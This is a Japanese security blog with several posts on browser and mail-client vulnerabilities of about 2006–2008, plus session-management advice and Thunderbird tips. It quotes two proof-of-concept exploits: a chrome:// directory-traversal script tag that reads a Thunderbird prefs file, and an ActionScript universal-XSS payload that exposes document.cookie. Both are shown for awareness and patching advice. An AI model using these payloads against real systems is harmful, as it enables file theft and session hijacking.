yohgaki's blog

前回のエントリでFirefoxの利用をお勧めしているので未パッチのFirefoxの脆弱性を紹介しておきます。

Firefox chrome: URL Handling Directory Traversalにchromeがディレクトリ遷移攻撃に脆弱だとレポートされています。

この脆弱性を用いるとシステム内のファイルを盗まれる可能性があります。（追記に書きましたが、正確にはJavaScriptとして読み取れる必要があります。コードを見ると判りますが、JSON形式のデータファイル, prefs.js等が読みとられる可能性があります。）PoCとしてWindows上のThunderbirdのall.jsを取得するコードが公開されています。

<script>pref = function(x, y){document.write(x + ' -> ' + y + '<br>');};</script>
<scriptsrc='chrome://downbar/content/%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%
2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files
%2fMozilla%20Thunderbird%2fgreprefs%2fall.js'>
</script>

悪意のあるメール、ページには注意が必要です。この種の例は多数あります。Firefoxの脆弱性だけでなくFlash, Adobe Reader, QuickTime, RealPlayerが代表例です。NoScriptは必須の拡張だと言えると思います。

ところで、このようなクライアント側の脆弱性はWeb開発者には関係ない、と考えた方はいないでしょうか?このFirefoxの脆弱性ではセッションIDを盗む事はできませんが、セッションIDを盗める脆弱性もあるのです。昨年末見つかったFlashのUnversal XSS脆弱性などは最悪の部類です。

セッションIDは神経質過ぎるくらいに管理した方が良いと考えています。セミナーなどで「セッション管理は必ずセッションクッキーを使うこと」と繰り返し説明しています。もし有効期限を設定したクッキーを利用している場合、簡単にセッションIDが盗めます。セキュアなWebアプリ作りには定石があります。「セッション管理は必ずセッションクッキーを使う」は基本の中の基本です。しかし、この基本に従っていないアプリケーションも多数あります。この様なアプリケーションの場合、ユーザのセッションIDを盗まれ成りすましによる攻撃を受ける可能性があります。

フレームワークを使っているから安全、などと言うことはありません。普通のフレームワークはセッション管理に利用するクッキーの有効期限は設定可能になっているからです。Webアプリ構築はサーバ側だけでなくクライアント側の問題も考えて作らなければ安全性を維持できません。

追記：
ITMediaに関連記事が載っていました。
http://www.itmedia.co.jp/news/articles/0801/24/news014.html

PoCの見ると関数をオーバーライドして情報を取得しているのでJavaScript形式で書かれた設定ファイルでないと読み取れない。JSONのデータをCSRFで盗むのと同じ要領です。データがJavaScriptとして読み出せるファイルだけしか読みこむ事ができません。FirefoxもThunderbirdもパスワードはDBだったかな? grepしてみた限りでは特に読まれて直ぐに危険、というjsファイルはありませんでした。

一般ユーザは拡張がjarなのかそうでないのか等、気にしていないし気づく事はまずありません。jarにして問題解決ならjarにしないと読めない仕様に変更すれば良いと思います。

ちょっとづつ編集していたら結構いい加減な事を書いていたので修正しました。

Flash Playerに深刻な脆弱性（簡単に他所のサイトのアカウントが乗っ取れる脆弱性と他の脆弱性）がありアップデートがリリースされています。

悪意のあるSWFファイルを読み込ませることによって脆弱性を悪用することができ、攻撃が成功すればシステムを乗っ取ることも可能だという。

http://internet.watch.impress.co.jp/cda/news/2007/12/20/17964.html

ここまでしか読まなければかなり控えめな表現であることが分かります。後半の方まで読むとエンジニアであれば理解できる書き方になっています。

Flash Playerにはクロスドメインポリシーファイルの扱いに関する脆弱性が存在しているという。その結果、細工を施されたWebページによって、サイトのクロスドメインポリシーが迂回される可能性があり、サイト管理者の意図に反してデータがアクセスされる可能性があるとしている。このほか、任意のHTTP ヘッダが送信可能な脆弱性も存在するという。

あまり素人向けの解説とは言えないかも知れません。Watchなのでこれでも良いのかも知れませんが。

Securiteamの記事は最初の方に重要な事が書いてあるので分かりやすいです。

This vulnerability allows remote attackers to run arbitrary JavaScript code in the security context of other domains,

http://www.securiteam.com/securitynews/6E00L00KKC.html

Universal Cross Site Scriptingと呼ばれるタイプの非常に危険な脆弱性です。別の言い方をすると他所のドメインのクッキーを自由に盗める脆弱性です。悪意のあるフラッシュを実行するとログイン状態にあるサイトのアカウントを乗っ取られる可能性があります。

しかもこの脆弱性の攻撃は非常に簡単です。元ネタのStanford大のページ、Securiteamのサイトには攻撃方法が記載されています。

Exploit:
package {
  import flash.display.Sprite;
  import flash.net.*;
  import flash.utils.*;

  public class uxssdemo extends Sprite {
    public function uxssdemo() {
      setTimeout(DoAttack, 1000);
    }

    public function DoAttack():void {
      var request:URLRequest =
          new URLRequest('javascript:alert("Cookie: "+document.cookie+"\\n\\nContent: \\n\\n" + document.lastChild.innerHTML);window.close();');
      navigateToURL(request, 'tg');
    }
  }
}

Flashをよく知らない人でも簡単に攻撃できます。もしまだアップグレードしていない方は即刻Flash Playerをアップグレードした方がよいです。

Adobeのセキュリティ情報
http://www.adobe.com/support/security/bulletins/apsb07-20.html

Flashのダウンロードページ
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash

Flashのバージョンチェック
http://kb.adobe.com/selfservice/viewContent.do?externalId=tn_15507

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5340
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5339

によるとThunderbird 2.0.0.8でDoS脆弱性が修正される、とされています。もうリリースされているのかな?
と思って

http://www.mozilla.com/en-US/thunderbird/

を見たのですがまだのようです。

DoSなので緊急性は低いはずです。Thunderbirdプロジェクトは独立するとさらにメンテナンス状態が悪くならないか心配です。OSXのMailにでも移行しようか、とも思いますがこれも今ひとつ信用できません。しばらくは様子見です。

Link: http://firefoxhacks.at.webry.info/200606/article_7.html

ホワイトペーパーというものは基本的に宣伝の為に作成するものであって「危険なソフトオウェア15種」というホワイトペーパーも宣伝の為のホワイトペーパーでしょうね。PDFのダウンロードには登録が必要らしい（？）のでPDF自体は読んでいません。「危険なソフトがインストールされていないかチェックするにはこちらを見てね」といった旨の記述がPDFにはあるらしいです。

マーケティングではパブリシティーを有効活用するのは重要な事です。このPDFはマーケティング的には、少なくとも日本では、成功していると思います。自社製品の宣伝目的だったとしても有用な注意喚起も記載されているようなので「宣伝だからダメ」と言うことは無いと思います。

このPDFによると1位はFirefox 1.0.7だそうです。Firefoxは1.0系はメンテナンスされてませんよね。Google AnalyticsのログによればこのブログにFirefoxでアクセスしているユーザのうち約13%は修正済みの脆弱性があるFirefoxでアクセスしていると思われます。賛否両論あるようですが自分が使っているソフトウェアがメンテナンスされているか知っておく事は重要だと思います。多くのユーザは自分が使っているソフトウェアがメンテナンスされているものなのか、されていないものなのか気していないです。時にはこういった注意喚起も必要と思いますが、これらを目にするのは普通のユーザではなくコンピュータを生業とする人達がほとんどでしょうね...

アンチウィルスソフトは普通に使われるようになりましたが、インストールされているがメンテナンスされている物か、脆弱性を含まないかチェックするソフトウェアがあると非常に便利だと思います。アンチウィルスソフトのメーカにがんばってもらって追加機能として付けてほしいですね。ウィルスのシグニチャ更新に比べればかなり簡単(?)にデータベースの維持はできそうに思えます。

とろろで、このホワイトペーパーにMS製品が無いのは選択基準のせいらしいですが、IEが載っていないのは危険なことは周知の事実だからとか?IEが危険と書いても話題にならないからとか?（実際「IEが危険です」と書いても話題にならないでしょうね）しかし、ユーザ数なども含めて選択するなら最も危険なアプリはダントツでIEだと思います。

セキュリティ対策は全体的な整合性が重要ですから、バージョンが古くて危険なソフトウェアなってしまっているソフトがインストールされている場合に警告するアプリは必要ですね。何故今までメジャーになるような製品が無かったのでしょうね?

ところで自分で「よくあるバージョンが古くて危険ソフトウェアのトップ5リスト」を作るならこんな感じでしょうね。

- Webブラウザ
- Webブラウザのプラグイン（Flash、音声、映像再生のプラグイン）
- インスタントメッセンジャー（Skypeもこれに含む）
- メールクライアント
- PDFリーダ（Acrobat Readerだけでなく、Linux等で利用されているフリーPDFリーダにも脆弱性がある）

なんだかここに取り上げているホワイトペーパーと同じようなリストになりますね。

今さっき気が付きました。Thunderbird 1.5.0.2のメッセージフィルタを編集、削除しようとすると無応答状態になりました。クリックできなくなった状態と言った方が良いかも知れません。私だけかな?

Windows XP SP2日本語版/Thunderbird 1.5.0.2 英語版

Link: http://www.securident.com/vuln/ff.txt

Firefox 1.5.0.2以下のiframe.contentWindow.focus()に問題がありバッファがオーバーフローするようです。これ件フォローが無いので真偽は??です。

NoScript拡張を使って不用意にJavaScriptが実行されないように注意した方が良いかも知れません。

http://www.noscript.net/whats

IEもObjectタグで騒ぎになっていますね。セミナーでは「WebクライアントとWebサーバアプリは最も危険なアプリです」と言っていますが最近は色々ありすぎですね...

ここにも書いてあるように日本語版Thunderbirdはダウンロードしづらかったので英語版をダウンロードしてインストールしました。

以前からThunderbirdはメモリ消費量が多く、しかも重い（重いのはメモリが768MBのノートPCではスワップするからですが）ので困っていたのですが英語版のメモリ消費量は随分少ないような気がします。そして、随分軽くなったように思えます。

しばらく使ってみないとどちらとも言えないですが、
気のせい?マイナーバージョンアップのせい?

英語版を試してみたい方、日本語版をインストールしたまま英語版をインストールしも大丈夫なようです。ただし、インストール後にデフォルトの文字エンコーディングを設定しないと面倒です。

Tools->Display->Fonts の

Output Encoding
Input Encoding

を両方ともISO-2022-JPに設定すると日本語版とあまり変わらず使えると思います。（もちろんメニューなどが英語で表示される事を除けば）

Link: http://www.us-cert.gov/cas/techalerts/TA06-107A.html

Thunderbirdのアップグレードが出たのでUS-CERTからアドバイザリが出てました。


Firefox： 1.5.0.2
Thunderbird: 1.5.0.2

SeaMonkey: 1.0.1


以外はリモートコード実行の脆弱性があります。重要なのは前にここにも書きましたがMozilla SuiteユーザはSeaMonkeyに移行しなければならないことです。


ついでにFirefoxしか普段使っていない方でIEにFlashをインストールしている方、IEのFlashを削除するかIEのFlashも最新にしなければなりません。
（Mozillaのどこかに書いてあるはず。先月のことだったかな?）


【追記】

Flash Player の更新に関する注意喚起
http://www.mozilla-japan.org/kb/solution/2092

最近使い物ならないくらいThunderbirdが遅くなってきていました。理由は簡単で「フォルダの最適化」を自動で行わないようにしていたのでゴミが大量に溜まったことが原因でした。

フォルダの最適化を自動化した場合、多くのフィルタルールがあるとエラーが発生する場合が多くあります。この為、手動でフォルダの最適化を行わないようにしていた事を忘れていました。早速フォルダの最適化を行いました。改善はしたのですがどうもまだ遅いままでした。

ちょっとググると.msfファイルを消すと症状が改善されると書いたページを見つけました。プロファイルディレクトリの.msfファイルを全部消してThunderbirdを起動すると随分パフォーマンスが改善されていました。

まだ遅いと思える動作があるのですがとりあえずこれで様子見。

Link: http://www.atmarkit.co.jp/news/200603/03/mozilla.html

最も高いのが欧州で20.10％、次いで豪州近辺の18.60％、北米の15.88％、アフリカの9.41％、アジアの8.81％、南米の5.79％だった。日本は中でも低く4％台だという。リリー氏は、「欧州ではかなり人気が高い。これはオープンソース好きという民族性だからだろうか。日本はそれに比べてかなり低いが、正直なところ主な原因は分かっていない。

日本のMicrosoft好きは今に始まったことではないです。WindowsNTが出たときも海外ではまだまだだった時から日本ではかなりの人気でした。日本人はMicrosoft好きという傾向はかなり強いようです。書籍も「Windowsに対応」と書いたり最初のほうに「C:\」が含まれている本の方が桁違いによく売れる（らしい）と聞いています。
# 最近新しい本を書き終えましたが、この法則に従っていませんね :p

だたIEはお勧めできるブラウザではないのは確かです。MS製品が嫌いという事ではないのですがIEは「個人的には怖くて使えない」が本音です。今年に入ってからもかなり過激なセキュリティホールがレポートされていますが、乗り換え組みはまだまだ少ないのですね。

そう言えば、このブログでもGoogleのFirefox Toolbarの紹介リンクを作っていますが紹介料って無かったか、有っても1回ぐらいだったような気がします。本当にあまり使われていないのかな?!

関連
IE, Firefox, Opera? どれを使う?